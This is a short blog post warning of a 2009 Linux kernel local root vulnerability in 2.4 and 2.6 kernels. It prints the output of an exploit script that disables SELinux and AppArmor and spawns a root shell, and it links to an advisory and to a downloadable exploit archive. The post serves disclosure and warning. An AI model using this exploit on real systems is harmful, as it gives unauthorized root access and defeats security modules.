Linux | System Administration | Web Development

Focusing on Linux, system administration, web development and the open-source world

High-Risk Linux Kernel Vulnerability


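This vulnerability affects all 2.4.x and 2.6.x kernel versions and their branches released since 2001.
This includes, but is not limited to, RedHat, CentOS, Suse, Debian, Ubuntu, Slackware, Mandriva, Gentoo and the systems derived from them.
Running a single command is enough to gain root privileges through this vulnerability, and even having SELinux enabled does not help!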

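I have tested this on CentOS 5.3 (2.6.18-128.el5), DC5SP2 (2.6.9-42.7AX), Ubuntu 9.04 Server (2.6.27-7-server), Ubuntu 9.10 Development (2.6.3.10-5-generic/2.6.31-5-pae) and Asianux 3.0 (2.6.18-8.10AX), and root account privileges could be obtained easily on all of them. All of the above systems are 32-bit. Below is a simple walkthrough of an attack: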

  $./wunderbar_emporium.sh
 [+] MAPPED ZERO PAGE!
 [+] Resolved selinux_enforcing to 0xc05d83fc
 [+] Resolved selinux_enabled to 0xc05d83f8
 [+] Resolved apparmor_enabled to 0xc048cba4
 [+] Resolved apparmor_complain to 0xc05d9ff0
 [+] Resolved apparmor_audit to 0xc05d9ff8
 [+] Resolved apparmor_logsyscall to 0xc05d9ffc
 [+] Resolved security_ops to 0xc05d6ba4
 [+] Resolved default_security_ops to 0xc048b940
 [+] Resolved sel_read_enforce to 0xc0228230
 [+] Resolved audit_enabled to 0xc059a5c4
 [+] got ring0!
 [+] detected 2.6 style 8k stacks
sh: mplayer: command not found
 [+] Disabled security of : LSM
 [+] Got root!
sh-3.2# id
uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),30(dip),46(plugdev),106(fuse),108(lpadmin),123(admin),124(sambashare),1003
sh-3.2# uname -a
Linux cp1.3yidc.cn 2.6.27-7-server #1 SMP Tue Nov 4 20:18:35 UTC 2008 i686 GNU/Linux

For more details, see the following link: http://archives.neohapsis.com/archives/fulldisclosure/2009-08/0174.html

The demonstration code can be obtained from the following link (take care of your data): http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium-3.tgz
